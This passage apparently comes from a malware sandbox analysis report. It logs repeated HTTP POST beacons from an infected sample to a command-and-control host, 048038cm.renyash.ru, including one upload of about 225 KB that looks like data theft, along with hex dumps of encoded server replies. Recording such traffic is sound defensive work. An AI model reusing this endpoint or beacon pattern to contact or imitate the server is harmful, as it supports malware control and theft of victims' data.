                                                                        Data Ascii: 98#*'%#84&,.).%[)#B>'18>8=015-8T(!F!\#=<(0!);" *0:9';3U5</P0/$/72]-V12,^9V% !((3#+'+9$8<!+%(3<'-#\04)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:00.745014906 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:01.077418089 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:01.605895996 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAPnUm1aQCYwLtUaFlnjTJr4SHncw9EJp9GvdxpJYTf%2FAbqaxmyB2qq3jspIw4w3ZH%2Fb9S%2BxkDtV944dm089V92XrZ5iGYMufXPJA8OdrAuQMbBr2KTyulx22sJEi8Vpru2UHWoh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94096ebb6742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10454&min_rtt=1677&rtt_var=8092&sent=191&recv=165&lost=0&retrans=0&sent_bytes=32906&recv_bytes=75444&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 54 2a 27 31 06 20 38 24 54 24 05 32 59 2a 2d 39 13 3e 0e 37 0a 29 38 28 0d 27 28 28 10 28 5e 36 09 33 11 2d 0c 22 2d 20 52 3c 3a 21 46 04 1e 21 5c 34 3d 20 13 29 23 03 56 3d 3f 30 5e 23 30 1b 59 27 3a 0b 14 32 2b 27 52 21 2c 27 50 25 2c 06 0a 3b 0a 0b 03 3a 30 2d 56 26 2e 2c 5e 0e 12 3a 0f 32 0e 21 11 28 38 22 02 27 1e 33 57 27 2b 04 04 30 3b 27 1d 34 3b 39 15 28 0e 23 56 27 2f 34 54 39 2b 2b 15 26 3a 30 50 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#T*'1 8$T$2Y*-9>7)8('(((^63-"- R<:!F!\4= )#V=?0^#0Y':2+'R!,'P%,;:0-V&.,^:2!(8"'3W'+0;'4;9(#V'/4T9++&:0P)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:01.607031107 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:01.940743923 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:02.472172022 CET958INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhqsQU5jjGAetqMcvk50uSIocB3IXlS7BVA90wIdQoGWf3jNx0AkqmZ1ouqwztjMWxoBIkHRll5k8vJbOOlg1JBlm6u5q6VFpDUFQyJww2bM4MvNL6t8EM9WMKPf8lsKRKRpGR9t"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940974296742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10007&min_rtt=1677&rtt_var=7339&sent=197&recv=170&lost=0&retrans=0&sent_bytes=33895&recv_bytes=77826&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 3f 24 21 06 21 38 37 0f 27 3c 3d 00 2b 3e 25 5c 3e 56 2c 18 3e 28 28 0e 26 01 38 10 3c 16 35 1d 25 2f 0f 09 22 2d 2c 11 2b 00 21 46 04 1e 21 10 37 3e 28 58 29 1d 21 53 29 5a 27 07 36 23 2a 01 27 2a 0b 1b 25 5e 20 0c 21 3f 3b 51 24 2c 30 08 2f 0a 36 5b 39 0e 39 54 32 14 2c 5e 0e 12 39 15 26 23 3e 04 3c 2b 2a 05 33 20 3c 08 27 38 31 5d 27 15 3f 13 23 38 3e 07 29 30 1e 0c 30 3f 06 10 2d 38 28 00 24 39 23 0e 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?$!!87'<=+>%\>V,>((&8<5%/"-,+!F!7>(X)!S)Z'6#*'*%^ !?;Q$,0/6[99T2,^9&#><+*3 <'81]'?#8>)00?-8($9#)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:02.473006010 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:02.805336952 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:03.335453033 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K5ose401ivxut8IkP9GCNkMw1yoTgYbRW8pAe3O%2FmvV%2FK0VhB9hL1yEXQUjtPnMyrGFMi2t0358pHVtoakeDecwxWSZ5VRzgEvQGFPY7IBVXs2n%2Fhr784AKu65%2BTcvbJ7i9DUBD9"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409798eb542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10965&min_rtt=1677&rtt_var=9498&sent=203&recv=175&lost=0&retrans=0&sent_bytes=34878&recv_bytes=80208&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 28 34 00 59 34 2b 0a 57 33 3c 25 07 29 13 3a 01 29 30 37 0a 29 5e 24 0c 32 06 30 10 3c 28 31 18 30 3f 22 51 36 5b 30 56 3c 00 21 46 04 1e 22 01 34 00 24 1d 2a 0a 29 52 29 12 2f 05 35 0e 3d 15 30 3a 3d 50 32 01 24 0d 35 02 33 13 30 2c 38 09 2f 37 35 06 2e 33 3d 56 32 04 2c 5e 0e 12 3a 08 32 30 1c 05 3c 28 31 1f 33 0e 1a 0f 25 15 25 5a 26 3b 0d 1e 34 38 25 5c 28 30 11 55 24 01 27 0d 2e 3b 0d 5e 30 39 2c 1c 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U(4Y4+W3<%):)07)^$20<(10?"Q6[0V<!F"4$*)R)/5=0:=P2$530,8/75.3=V2,^:20<(13%%Z&;48%\(0U$'.;^09,)2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:03.336776018 CET308OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 225372
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:03.669231892 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:05.567037106 CET816INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R5i3ACzQjeMYloVIm1BqP3vGlt43jkbSh%2BrRRyoZIEo%2F8JAMQqGCK2LjwWSuyW8RoHAX2NBpPsVcy5w8myGilso7hOZZaZbFn2Y4SYrjNPb2WyNlnMycT2bAtDD0e33UD7VPr%2B7X"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94097eecde42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11130&min_rtt=1677&rtt_var=9687&sent=286&recv=410&lost=0&retrans=0&sent_bytes=35869&recv_bytes=305888&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0
                                                                        Dec 28, 2024 20:43:05.567343950 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:05.899681091 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:06.438407898 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ewm1YX%2FghP3yedJ%2BwR9Pnpye77YXsfEBdwmDOuNIcI7U7QoqEmUHsLQm6QhcfIANIKs8MZ3llsZ5QSJzS07Zo3pie9WsnteTB3amWTuvlobDMYUsumq4GLCzWUs1t6XrfpgCWrHm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94098cdb9942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11760&min_rtt=1677&rtt_var=10786&sent=292&recv=415&lost=0&retrans=0&sent_bytes=36710&recv_bytes=308270&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0e 2b 1a 35 07 20 2b 28 1f 33 02 2a 59 2b 3d 25 10 29 23 3f 44 29 16 19 54 27 28 27 03 3e 3b 32 09 33 3c 35 0f 35 03 2c 1e 3f 3a 21 46 04 1e 22 05 20 2e 2c 5f 3e 55 2e 0f 2a 02 02 5d 22 1e 22 07 30 14 0f 50 31 06 02 0c 35 3c 3f 57 27 3c 23 56 2c 42 2e 5f 2d 0e 26 0b 26 04 2c 5e 0e 12 3a 0b 26 20 31 58 28 06 17 12 27 0e 20 0e 31 05 29 11 27 05 01 13 23 5e 25 1b 2b 09 23 55 33 3c 2b 0c 2d 2b 06 01 27 39 3c 54 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +5 +(3*Y+=%)#?D)T'('>;23<55,?:!F" .,_>U.*]""0P15<?W'<#V,B._-&&,^:& 1X(' 1)'#^%+#U3<+-+'9<T)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:06.439766884 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:06.773401022 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:07.302690029 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UfEy8f3781Uu%2FSe8%2FMoj8hv4p76nsbD5F6ueJfudwEcpBveG7hNA6fwcyDtHUy4cgve2eArYwJP6fqRiAiJgc3RyD7p00UNFecm9pUt3jbJ71C4MpM0pTi4l5UybfpjIqB4Q9dG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940992594242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14475&min_rtt=1677&rtt_var=15869&sent=298&recv=420&lost=0&retrans=0&sent_bytes=37699&recv_bytes=310676&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 2b 37 35 03 23 28 2c 1f 33 05 32 58 3d 5b 25 11 3e 1e 20 1a 29 01 37 54 31 3b 2f 03 3e 3b 2e 45 27 2c 36 1e 36 5b 33 0e 28 3a 21 46 04 1e 22 03 37 00 06 12 2a 33 21 53 29 05 3f 04 21 56 36 00 27 04 26 08 32 06 02 0b 36 5a 3b 57 27 02 09 50 38 1d 22 19 3a 20 0b 57 26 3e 2c 5e 0e 12 3a 0a 25 23 3e 00 2b 01 25 5c 24 23 2b 1f 27 2b 00 02 24 38 2f 1d 37 38 31 1b 29 30 37 52 24 3f 2c 52 2d 3b 2f 1b 30 39 02 13 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +75#(,32X=[%> )7T1;/>;.E',66[3(:!F"7*3!S)?!V6'&26Z;W'P8": W&>,^:%#>+%\$#+'+$8/781)07R$?,R-;/09*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:07.303625107 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:07.635962963 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:08.159806013 CET962INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=df2AJ7mq73utRa73DZru0cc1Ryk8fdRi5bFkRE9Eiwfw10VjplCoKJOZ6XobbTxiXfvOaxt3rIbZch3YHWBFMQZOq36wKWHDOusFVE54Le7J2FMv%2FK44EmJVECqH7Jy3YLXkaIVW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940997bf2542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14219&min_rtt=1677&rtt_var=13957&sent=304&recv=425&lost=0&retrans=0&sent_bytes=38688&recv_bytes=313082&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 3f 1a 0f 00 37 05 2f 0d 33 05 31 04 2a 04 21 5b 3e 0e 2b 08 2a 28 20 0c 25 3b 3f 00 3c 5e 21 1d 33 11 0f 0f 20 2d 3b 0a 28 3a 21 46 04 1e 21 13 23 00 02 5e 2a 23 0f 1c 2b 2f 33 07 36 09 39 17 24 29 3d 1b 25 01 3f 55 20 3c 24 0c 27 5a 27 57 38 34 22 17 2d 09 3a 0c 26 14 2c 5e 0e 12 39 1a 25 20 22 04 28 38 25 58 24 33 38 08 25 15 04 05 26 38 23 13 34 06 25 15 28 33 24 0c 30 59 34 1d 2d 5d 20 00 27 07 24 54 29 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?7/31*![>+*( %;?<^!3 -;(:!F!#^*#+/369$)=%?U <$'Z'W84"-:&,^9% "(8%X$38%&8#4%(3$0Y4-] '$T)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:08.160877943 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:08.493146896 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:09.016171932 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=632P98PZoHzDjlBl8L50dalDVACMzcRwV1%2F%2FIvbMai2edeEJ5QCzyQSfMVs6sCw%2BWbsdhzcXE3XTaalHzqL%2BGS%2FDX2RKMXLKZZcyTjSHaOaNGinHBgstFw4uvvpRrglfBtZuhIJ2"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94099d1d3e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14266&min_rtt=1677&rtt_var=13391&sent=310&recv=430&lost=0&retrans=0&sent_bytes=39675&recv_bytes=315488&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 28 42 3a 5e 34 05 02 1c 27 05 2e 1b 2a 2d 2d 58 28 33 2b 45 2b 2b 34 0c 27 28 2c 5e 3f 38 22 07 27 01 26 55 36 3e 27 0f 2b 10 21 46 04 1e 22 04 23 2e 28 5a 3e 0a 31 55 2b 3f 3c 16 22 0e 22 04 27 04 31 52 25 28 28 0c 36 02 33 57 30 02 2f 56 2c 24 26 19 2e 20 21 55 32 3e 2c 5e 0e 12 3a 09 26 30 3d 58 28 01 29 59 24 23 3b 12 31 38 39 5b 24 3b 3f 56 21 38 31 16 3f 30 1a 0b 33 06 28 1d 39 38 3b 5c 33 07 24 1d 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(B:^4'.*--X(3+E++4'(,^?8"'&U6>'+!F"#.(Z>1U+?<""'1R%((63W0/V,$&. !U2>,^:&0=X()Y$#;189[$;?V!81?03(98;\3$+"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:09.017096996 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:09.350409031 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:09.882715940 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYr%2F6xBGfn5pe7uVtGadGPIbVjZsipSFjA6%2Fkkl8%2FFdw3fsiVsEgVvYfxV1DoInbA2t3W7JbhawC1pq%2FOEKAfzFmAhbHHxtfpCQN%2Bos6rMO72xdwdtws91d7veuS7NabKJLFZ8WE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409a26b0d42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12648&min_rtt=1677&rtt_var=9988&sent=316&recv=435&lost=0&retrans=0&sent_bytes=40670&recv_bytes=317894&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1f 3f 1a 31 07 20 3b 09 0c 30 12 2e 59 2b 3d 2d 1e 3d 20 28 1d 29 28 28 09 25 06 0e 59 3c 5e 36 44 30 3f 36 57 22 13 33 0b 2b 10 21 46 04 1e 22 00 34 07 3c 1d 3e 0d 22 0e 3d 02 33 05 36 0e 1c 00 30 04 26 08 32 38 3b 55 35 3c 0d 56 24 12 24 0f 38 37 3e 19 2d 30 0c 0d 26 3e 2c 5e 0e 12 39 15 32 0e 3d 11 29 2b 3e 04 24 33 37 1c 31 3b 04 03 24 2b 0e 08 23 2b 31 5e 3c 20 15 54 27 11 3f 0a 3a 38 38 00 26 2a 2b 0f 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#?1 ;0.Y+=-= ()((%Y<^6D0?6W"3+!F"4<>"=360&28;U5<V$$87>-0&>,^92=)+>$371;$+#+1^< T'?:88&*+="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:09.886603117 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:10.220232010 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:10.753132105 CET973INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=leqNZSXXe8QVgT66VW6WBvF598s88g58ETiwC4XTFkrglB8PWuCQszTVE%2BE%2B5NlLo%2FeOFElEwiT4hI0fYg%2FdC5MqDTm8PhdH6y%2F%2B8VY8UzrAlBuBJSH4yBiNnRakuIc%2FF8fmYNpx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409a7d92f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12094&min_rtt=1677&rtt_var=9119&sent=322&recv=440&lost=0&retrans=0&sent_bytes=41664&recv_bytes=320300&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 28 1d 2a 5e 20 02 30 1f 33 3c 26 58 29 3e 35 10 29 30 27 43 3e 38 2b 1d 27 28 3c 5f 3f 06 0c 0a 27 01 08 1d 21 03 2f 0a 3f 2a 21 46 04 1e 21 13 23 10 30 5e 2a 1d 25 57 29 12 2f 06 35 30 3a 05 33 04 0b 1a 26 16 23 54 36 12 0e 0d 24 3f 2c 0b 2c 0a 0c 5b 2e 09 2d 1d 24 2e 2c 5e 0e 12 3a 09 25 09 3d 11 3f 01 39 5a 26 30 38 0c 32 3b 29 12 24 05 3c 0d 34 2b 25 1b 3f 56 3b 56 27 2c 2b 0a 2d 15 3f 5d 27 29 20 50 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (*^ 03<&X)>5)0'C>8+'(<_?'!/?*!F!#0^*%W)/50:3&#T6$?,,[.-$.,^:%=?9Z&082;)$<4+%?V;V',+-?]') P=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:10.755019903 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:11.087271929 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:11.613184929 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1SEI9pYL03RC8O9rJDaDtJb8DEn4Nxp9XoqWPnQcIj0qoSblpEe4EDQqg%2BLWfMU0cVMaGCL5NzDgI24ERZlBxzoVuRds1Qsf%2Bp5Btrndg9wzAgfn4NZwlNoSIQ5ZC74lheLUNSU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ad484742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12613&min_rtt=1677&rtt_var=10479&sent=328&recv=445&lost=0&retrans=0&sent_bytes=42662&recv_bytes=322706&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 52 3f 24 31 07 20 38 24 55 24 2c 31 06 3d 03 39 5b 29 56 33 07 29 38 30 08 26 16 3b 01 28 16 0c 08 24 11 07 0c 22 3d 0d 0d 28 3a 21 46 04 1e 21 13 34 2d 20 1d 2a 33 07 1e 3e 05 33 06 36 30 32 00 26 39 3a 0b 26 3b 38 0f 36 05 3f 56 27 3f 27 19 2d 37 29 04 3a 23 25 56 26 14 2c 5e 0e 12 39 50 32 33 3e 01 28 28 3e 03 26 23 34 09 25 28 31 59 30 3b 24 08 21 28 3d 5c 28 1e 24 0f 33 3f 28 1f 2c 3b 24 07 33 07 20 1d 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#R?$1 8$U$,1=9[)V3)80&;($"=(:!F!4- *3>3602&9:&;86?V'?'-7):#%V&,^9P23>((>&#4%(1Y0;$!(=\($3?(,;$3 *"!^/,Q4TV0
